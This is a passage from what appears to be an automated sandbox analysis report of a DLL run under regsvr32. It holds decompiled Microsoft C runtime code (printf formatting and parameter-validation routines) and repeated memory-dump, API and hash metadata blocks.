                                				_t217 = _a816 + _a708;
                                				_a816 = _t217;
                                				 *_a64 = _a816 & 0x000000ff;
                                				_a64 = _a64 - 1;
                                				goto 0xf9d3c915;
                                				_a104 = _t217;
                                				_a64 = _a64 + 1;
                                				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                				if (_a104 == 0) goto 0xf9d3ca12;
                                				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                				_a64 = _a64 - 1;
                                				 *_a64 = 0x30;
                                				_a104 = _a104 + 1;
                                				if (_a108 != 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                				_a84 = 0x2d;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                				_a84 = 0x2b;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                				_a84 = 0x20;
                                				_a92 = 1;
                                				_a840 = _a88 - _a104 - _a92;
                                				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                				if (_a76 == 0) goto 0xf9d3cc1d;
                                				if (_a104 <= 0) goto 0xf9d3cc1d;
                                				_a872 = 0;
                                				_a848 = _a64;
                                				_a856 = _a104;
                                				_a856 = _a856 - 1;
                                				if (_a856 == 0) goto 0xf9d3cc1b;
                                				_a1056 =  *_a848 & 0x0000ffff;
                                				r9d = _a1056 & 0x0000ffff;
                                				r8d = 6;
                                				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                				_a848 =  &(_a848[1]);
                                				if (_a872 != 0) goto 0xf9d3cbe5;
                                				if (_a860 != 0) goto 0xf9d3cbf2;
                                				_a688 = 0xffffffff;
                                				goto 0xf9d3cc1b;
                                				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                				goto 0xf9d3cb60;
                                				goto 0xf9d3cc3b;
                                				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                				if (_a688 < 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				if (_a96 == 0) goto 0xf9d3cc8e;
                                				0xf9d25330();
                                				_a96 = 0;
                                				goto 0xf9d3b99c;
                                				if (_a704 == 0) goto 0xf9d3ccb4;
                                				if (_a704 == 7) goto 0xf9d3ccb4;
                                				_a1060 = 0;
                                				goto 0xf9d3ccbf;
                                				_a1060 = 1;
                                				_t252 = _a1060;
                                				_a876 = _t252;
                                				if (_a876 != 0) goto 0xf9d3cd05;
                                				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                				_a32 = _t354;
                                				r9d = 0;
                                				r8d = 0x8f5;
                                				0xf9d2b3b0();
                                				if (_t252 != 1) goto 0xf9d3cd05;
                                				asm("int3");
                                				if (_a876 != 0) goto 0xf9d3cd61;
                                				0xf9d2ab30();
                                				 *_t354 = 0x16;
                                				_a32 = 0;
                                				r9d = 0x8f5;
                                				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                				_a912 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_a120);
                                				goto 0xf9d3cd80;
                                				_a916 = _a688;
                                				E000007FE7FEF9D26800( &_a120);
                                				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                			}












                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: '$0$9
                                • API String ID: 1967237116-269856862
                                • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                • String ID: csm
                                • API String ID: 2005287440-1018135373
                                • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FileModuleName__initmbctable
                                • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                • API String ID: 3548084100-1254873407
                                • Opcode ID: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                • Instruction ID: c1f8112261206beaa0fda4b6683aef0dc38e0cb6ee3d4e311a15053ab41967b3
                                • Opcode Fuzzy Hash: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                • Instruction Fuzzy Hash: 47411C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3717698799
                                • Opcode ID: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                • Instruction ID: 7c05dd3e5b110925f13ad37327732dcd8002d47ee9d5ea83dce110c9ec813185
                                • Opcode Fuzzy Hash: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                • Instruction Fuzzy Hash: B6412931E1C7868AEAB08B24E8447AE62E0F385365F604335D6ED427F5DB3EE444CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                • API String ID: 2306298712-3864165772
                                • Opcode ID: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                • Instruction ID: 3bda70979e2781d9fddcfcf2e5c0164bb67a8e60ab66e06e656835f18ed7d390
                                • Opcode Fuzzy Hash: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                • Instruction Fuzzy Hash: 3A313D72A09BC585E7B08B19E84076E73E1F385764F618225CAED877E4DB3DE405CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                • API String ID: 2123368286-2562677240
                                • Opcode ID: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                • Instruction ID: 93e11cc603146a2a446790da906b27a7af07cbd58e629032b7549c60c7683809
                                • Opcode Fuzzy Hash: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                • Instruction Fuzzy Hash: 4A311632A0DB8685EAB09B15E8407AEB7E1F385390F204225D6DD03BE8DB7ED444CB02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter$__doserrno
                                • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                • API String ID: 1181141450-2845860089
                                • Opcode ID: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                • Instruction ID: 33c12517d78d4ed4392c0426817be49b117e9f4526535de823d8000f08003729
                                • Opcode Fuzzy Hash: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                • Instruction Fuzzy Hash: 81315A36A28A4686E7909B18E88476E77E0F380794F205125F6CE47BF5CB7ED841CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                • API String ID: 2123368286-160817255
                                • Opcode ID: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                • Instruction ID: 5484b95fc3e7d8404cd289b1f0f4537a60eed7c4b35d0a2d8431c0a05804e9c3
                                • Opcode Fuzzy Hash: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                • Instruction Fuzzy Hash: F121AE71B2C6428AE7D89B24EC8476DB3E1F380356F609635E1DD476E4D77ED4408B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                • API String ID: 2123368286-3409824857
                                • Opcode ID: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                • Instruction ID: f9aafbf46e1760e7e33942ab5f057e126490a1467b3f18266bcf817366ff1fd0
                                • Opcode Fuzzy Hash: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                • Instruction Fuzzy Hash: 5B214C72A1D64286EB909F58E88476E77E0F380394F605525E6CE476E4CBBED444CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_
                                • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                • API String ID: 1901436342-3621827421
                                • Opcode ID: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                • Instruction ID: 30d3218aedea65180b246fff2bb8bf0e075bfccfde79c9cac609a79bfc2ef9ad
                                • Opcode Fuzzy Hash: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                • Instruction Fuzzy Hash: 4D210132918A8186E790DB24E8817AEB7E0F7C4780F614022E7DD83AB9DB7DD954CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                • API String ID: 2123368286-2972513288
                                • Opcode ID: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                • Instruction ID: a668ed4e1bbba8445569e891f5cf80d88739aba3494b1a7bdc37a92eebe2cfe6
                                • Opcode Fuzzy Hash: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                • Instruction Fuzzy Hash: 9A211A31E1D242CAE7E08F28EC44B6E72E0F344395F605536E6CA866B4D77EE944CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                • API String ID: 2123368286-367560414
                                • Opcode ID: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                • Instruction ID: 95dcae893ef448fe982beb095dca5536e461671d142ad8532ffb40fd25d94385
                                • Opcode Fuzzy Hash: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                • Instruction Fuzzy Hash: 1D114931E0C64A8AF7E08B14EC457BE62E0F750385F608425D2DD46AF5DBBEE4888B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                • API String ID: 2123368286-2992382544
                                • Opcode ID: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                • Instruction ID: 1601facfcd706bab2d32f933ec1205f4baa2dc81ccca363939aa7dccefded7e9
                                • Opcode Fuzzy Hash: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                • Instruction Fuzzy Hash: FD112831A08A86D6E7F08B24EC547BE62D1F384395FA0862581DD826E5DF7ED184CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                • API String ID: 2123368286-3532421942
                                • Opcode ID: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                • Instruction ID: 5e243132be0629da1aa3e0b85d41bf950597728ff9ff9f12ab22c17114f4bf60
                                • Opcode Fuzzy Hash: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                • Instruction Fuzzy Hash: DB115A71A2D6468AEB949B54E948B6E73E0F340344F605225F6D943AA8C77ED509CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                • API String ID: 2123368286-152112980
                                • Opcode ID: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                • Instruction ID: 316e0cb66aac120259ec5fe7cf49b7d80870e23a4d2a4d539908350f5dd74761
                                • Opcode Fuzzy Hash: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                • Instruction Fuzzy Hash: C1112A31A0CA87C9F7A09B54EC047AE76E0F340345F704425D6CC466F4CBBEE8888B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                • API String ID: 433497747-929597301
                                • Opcode ID: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                • Instruction ID: 481e6957a9246cfaf4e6bd41be43a49f1ef1e62944320565ea2ccce3e108d99c
                                • Opcode Fuzzy Hash: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                • Instruction Fuzzy Hash: F9012D21A2C64286E3D09B25EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3131718208
                                • Opcode ID: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                • Instruction ID: 25215b7a66bf5335accef34de15d40bd2ed0749c1f690011489e68f1b39c7366
                                • Opcode Fuzzy Hash: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                • Instruction Fuzzy Hash: F3113571E086429AF7A09B28E9047BE62D0F344308F608525A7EC076F5DB7EE548CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-1927795013
                                • Opcode ID: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                • Instruction ID: 944cdc0bbf70bc89b755e38a530f77822666c2a95ff09ee036fe4101a55fb2d6
